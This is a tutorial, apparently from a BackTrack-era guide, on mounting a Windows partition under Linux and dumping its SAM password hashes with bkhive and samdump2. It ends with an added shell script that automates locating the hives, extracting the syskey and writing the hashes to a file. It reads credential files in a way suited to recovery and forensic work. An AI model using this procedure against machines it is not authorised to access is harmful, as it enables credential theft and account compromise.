1. Mount your Windows partition, substituting hda1 with whatever your Windows partition actually is (fdisk -l will list the partitions). You only need to read the hives, so mounting read-only (-o ro) is the safer choice.
# mount /dev/hda1 /mnt/XXX
2. If the syskey (boot key) is stored locally, you need to extract it from the SYSTEM hive so you can decrypt the SAM. If syskey is set up to prompt for a password, or the password is on a floppy, stop now and read the syskey section of this document for more information about syskey. If Windows is installed somewhere other than C:\WINDOWS, substitute the correct path. WARNING: under Linux the path is case sensitive, and so are the filenames sam, security and system. On my system these files are lowercase. I have come across other XP systems where they are uppercase. On the Vista system I have used, the filenames are uppercase. Run ls /mnt/XXX/WINDOWS/system32/config first and use whatever case you see there in the commands below.
BackTrack 2 users use the following:
# bkhive-linux /mnt/XXX/WINDOWS/system32/config/system syskey.txt
BackTrack 3 users use the following:
# bkhive /mnt/XXX/WINDOWS/system32/config/system syskey.txt
3. Dump the SAM, using the extracted key to decrypt it:
# samdump2 /mnt/XXX/WINDOWS/system32/config/sam syskey.txt >hash.txt
samdump2 writes the hashes to the screen (standard output); the > character redirects that output into a file called hash.txt.
You can also run samdump2 with the -o parameter to write the output to a file:
# samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt
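The procedure above, as an added example that is not part of the original tutorial: a POSIX shell script that wraps the mount, bkhive and samdump2 steps and handles the case-sensitivity problem the text warns about by locating the hives case-insensitively instead of hard-coding WINDOWS/system32/config. It assumes GNU (or busybox) find for -ipath, that bkhive (BackTrack 3) or bkhive-linux (BackTrack 2) and samdump2 are on PATH when you actually dump, and takes the mount point (the /mnt/XXX placeholder) as an argument. The function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original tutorial. Assumes GNU/busybox find
# (-ipath) and, for the real dump, bkhive or bkhive-linux plus samdump2 in PATH.

# Step 1: mount the Windows partition read-only. We only read the hives, and a
# read-only mount leaves the filesystem untouched.
mount_windows() {
    dev="$1"; mnt="$2"          # e.g. /dev/hda1 /mnt/XXX
    mkdir -p "$mnt" && mount -o ro "$dev" "$mnt"
}

# Print the full path of a registry hive ("sam", "system", "security") below a
# mount point, whatever the case of WINDOWS/system32/config and of the file
# name (sam vs SAM). Returns 1 if nothing matches.
find_hive() {
    mnt="$1"; hive="$2"
    hit=$(find "$mnt" -maxdepth 5 -type f -ipath "*/system32/config/$hive" \
            2>/dev/null | head -n 1)
    [ -n "$hit" ] || return 1
    printf '%s\n' "$hit"
}

# Resolve both hives needed for the dump and print them as KEY=VALUE lines.
# Returns 1 if either is missing, so the caller fails before running any tool.
resolve_hives() {
    mnt="$1"
    syshive=$(find_hive "$mnt" system) || { echo "no system hive under $mnt" >&2; return 1; }
    samhive=$(find_hive "$mnt" sam)    || { echo "no sam hive under $mnt" >&2; return 1; }
    printf 'SYSTEM=%s\nSAM=%s\n' "$syshive" "$samhive"
}

# Pick the bootkey extractor for this BackTrack release and print its name.
bkhive_tool() {
    if command -v bkhive >/dev/null 2>&1; then echo bkhive                # BackTrack 3
    elif command -v bkhive-linux >/dev/null 2>&1; then echo bkhive-linux  # BackTrack 2
    else return 1; fi
}

# Steps 2 and 3: extract the syskey from the SYSTEM hive, then decrypt and
# dump the SAM with it. Prints the path of the resulting hash file.
dump_hashes() {
    mnt="$1"; outdir="${2:-.}"
    syshive=$(find_hive "$mnt" system) || return 1
    samhive=$(find_hive "$mnt" sam)    || return 1
    bk=$(bkhive_tool) || { echo "bkhive/bkhive-linux not in PATH" >&2; return 2; }
    "$bk" "$syshive" "$outdir/syskey.txt" || return 3
    # Same as: samdump2 -o hash.txt <sam hive> syskey.txt
    samdump2 "$samhive" "$outdir/syskey.txt" > "$outdir/hash.txt" || return 3
    printf '%s\n' "$outdir/hash.txt"
}

# Usage: sh dumpsam.sh /mnt/XXX [outdir]   (run mount_windows first, or mount by hand)
if [ $# -ge 1 ]; then
    resolve_hives "$1" && dump_hashes "$1" "${2:-.}"
fi
```

resolve_hives is deliberately separate from dump_hashes so you can confirm the script found the right SYSTEM and SAM files (and see which case this install uses) before any tool touches them; a wrong hive path is the most common reason bkhive fails on a mounted partition.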